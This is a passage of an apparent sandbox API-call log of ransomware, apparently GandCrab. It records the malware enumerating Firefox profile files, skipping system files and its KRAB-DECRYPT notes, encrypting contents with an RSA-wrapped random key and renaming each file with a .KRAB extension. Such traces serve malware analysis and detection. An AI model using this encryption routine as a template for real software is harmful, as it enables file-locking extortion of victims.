(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4") returned 174 [0080.186] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="desktop.ini") returned -1 [0080.186] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="autorun.inf") returned -1 [0080.186] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="ntuser.dat") returned -1 [0080.186] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="iconcache.db") returned -1 [0080.186] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="bootsect.bak") returned -1 [0080.186] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="boot.ini") returned -1 [0080.186] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="ntuser.dat.log") returned -1 [0080.186] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="thumbs.db") returned -1 [0080.186] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="KRAB-DECRYPT.html") returned -1 [0080.186] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.186] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="CRAB-DECRYPT.txt") returned -1 [0080.187] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="ntldr") returned -1 [0080.187] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="NTDETECT.COM") returned -1 [0080.187] lstrcmpiW (lpString1="1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4", lpString2="Bootfont.bin") returned -1 [0080.187] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.187] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x10113d0) returned 1 [0080.188] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0080.189] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0080.189] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0080.189] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0080.189] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0080.189] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.190] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1010b50) returned 1 [0080.191] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0080.192] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0080.192] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0080.192] CryptGenRandom (in: hProv=0x1010b50, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0080.192] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0080.192] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.192] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1010f90) returned 1 [0080.194] CryptImportKey (in: hProv=0x1010f90, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023cb8) returned 1 [0080.194] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0080.194] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0080.194] GetLastError () returned 0x0 [0080.194] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0080.194] CryptReleaseContext (hProv=0x1010f90, dwFlags=0x0) returned 1 [0080.194] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x10111b0) returned 1 [0080.213] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023cb8) returned 1 [0080.213] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0080.213] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3010100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x3010100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0080.213] GetLastError () returned 0x0 [0080.213] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0080.213] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0080.214] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7e4 [0080.216] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0080.216] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0080.216] ReadFile (in: hFile=0x7e4, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x1435, lpOverlapped=0x0) returned 1 [0080.251] SetFilePointerEx (in: hFile=0x7e4, liDistanceToMove=0xffffebcb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.251] WriteFile (in: hFile=0x7e4, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1435, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x1435, lpOverlapped=0x0) returned 1 [0080.251] WriteFile (in: hFile=0x7e4, lpBuffer=0x3010000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3010000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0080.251] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.271] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.272] CloseHandle (hObject=0x7e4) returned 1 [0080.281] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.282] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\1495600032629.d896fec9-1a7a-4db1-a3a2-e46d95b631a5.main.jsonlz4.krab")) returned 1 [0080.282] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.283] FindNextFileW (in: hFindFile=0xffe758, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0080.283] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0080.283] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0080.283] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\d2ca4a08d2ca4dee3d.lock" [0080.283] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.283] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 139 [0080.283] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\d2ca4a08d2ca4dee3d.lock") returned 134 [0080.283] lstrlenW (lpString=".lock") returned 5 [0080.283] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.284] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".lock ") returned 6 [0080.284] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.284] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.284] FindNextFileW (in: hFindFile=0xffe758, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0080.284] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0080.284] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0080.284] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\KRAB-DECRYPT.txt" [0080.284] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.285] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\KRAB-DECRYPT.txt.KRAB") returned 132 [0080.285] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\KRAB-DECRYPT.txt") returned 127 [0080.285] lstrlenW (lpString=".txt") returned 4 [0080.285] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.285] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".txt ") returned 5 [0080.285] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.285] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\KRAB-DECRYPT.txt") returned 127 [0080.285] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\2017-05\\KRAB-DECRYPT.txt") returned 127 [0080.285] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0080.285] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0080.285] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0080.286] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0080.286] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0080.286] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0080.286] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0080.286] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0080.286] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0080.286] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0080.286] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.286] FindNextFileW (in: hFindFile=0xffe758, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 0 [0080.286] FindClose (in: hFindFile=0xffe758 | out: hFindFile=0xffe758) returned 1 [0080.289] CloseHandle (hObject=0x484) returned 1 [0080.290] FindNextFileW (in: hFindFile=0xffe4d8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0080.290] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0080.290] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0080.290] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\d2ca4a08d2ca4dee3d.lock" [0080.290] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.290] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 131 [0080.290] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\d2ca4a08d2ca4dee3d.lock") returned 126 [0080.290] lstrlenW (lpString=".lock") returned 5 [0080.290] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.291] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".lock ") returned 6 [0080.291] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.291] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.291] FindNextFileW (in: hFindFile=0xffe4d8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0080.291] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0080.291] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0080.291] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\KRAB-DECRYPT.txt" [0080.291] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.292] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\KRAB-DECRYPT.txt.KRAB") returned 124 [0080.292] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\KRAB-DECRYPT.txt") returned 119 [0080.292] lstrlenW (lpString=".txt") returned 4 [0080.292] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.297] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".txt ") returned 5 [0080.297] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.297] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\KRAB-DECRYPT.txt") returned 119 [0080.297] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\archived\\KRAB-DECRYPT.txt") returned 119 [0080.297] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0080.297] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0080.297] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0080.297] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0080.297] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0080.297] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0080.297] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0080.298] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0080.298] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0080.298] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0080.298] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.298] FindNextFileW (in: hFindFile=0xffe4d8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0 [0080.298] FindClose (in: hFindFile=0xffe4d8 | out: hFindFile=0xffe4d8) returned 1 [0080.298] CloseHandle (hObject=0x720) returned 1 [0080.299] FindNextFileW (in: hFindFile=0xffea98, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0080.299] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0080.299] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0080.299] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\d2ca4a08d2ca4dee3d.lock" [0080.299] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.299] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 122 [0080.299] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\d2ca4a08d2ca4dee3d.lock") returned 117 [0080.299] lstrlenW (lpString=".lock") returned 5 [0080.299] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.299] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".lock ") returned 6 [0080.300] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.300] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.300] FindNextFileW (in: hFindFile=0xffea98, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0080.300] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0080.300] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0080.300] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\KRAB-DECRYPT.txt" [0080.300] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.301] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\KRAB-DECRYPT.txt.KRAB") returned 115 [0080.301] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\KRAB-DECRYPT.txt") returned 110 [0080.301] lstrlenW (lpString=".txt") returned 4 [0080.301] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.301] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".txt ") returned 5 [0080.301] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.301] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\KRAB-DECRYPT.txt") returned 110 [0080.301] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\KRAB-DECRYPT.txt") returned 110 [0080.301] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0080.301] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0080.302] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0080.302] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0080.302] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0080.302] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0080.302] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0080.302] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0080.302] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0080.302] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0080.302] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.302] FindNextFileW (in: hFindFile=0xffea98, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0080.302] lstrcmpW (lpString1="session-state.json", lpString2=".") returned 1 [0080.302] lstrcmpW (lpString1="session-state.json", lpString2="..") returned 1 [0080.302] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\", lpString2="session-state.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json" [0080.302] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0080.304] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json.KRAB") returned 117 [0080.304] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json") returned 112 [0080.305] lstrlenW (lpString=".json") returned 5 [0080.305] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3010000 [0080.305] wsprintfW (in: param_1=0x3010000, param_2="%s " | out: param_1=".json ") returned 6 [0080.305] VirtualFree (lpAddress=0x3010000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.305] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\datareporting\\session-state.json") returned 112 [0080.305] lstrlenW 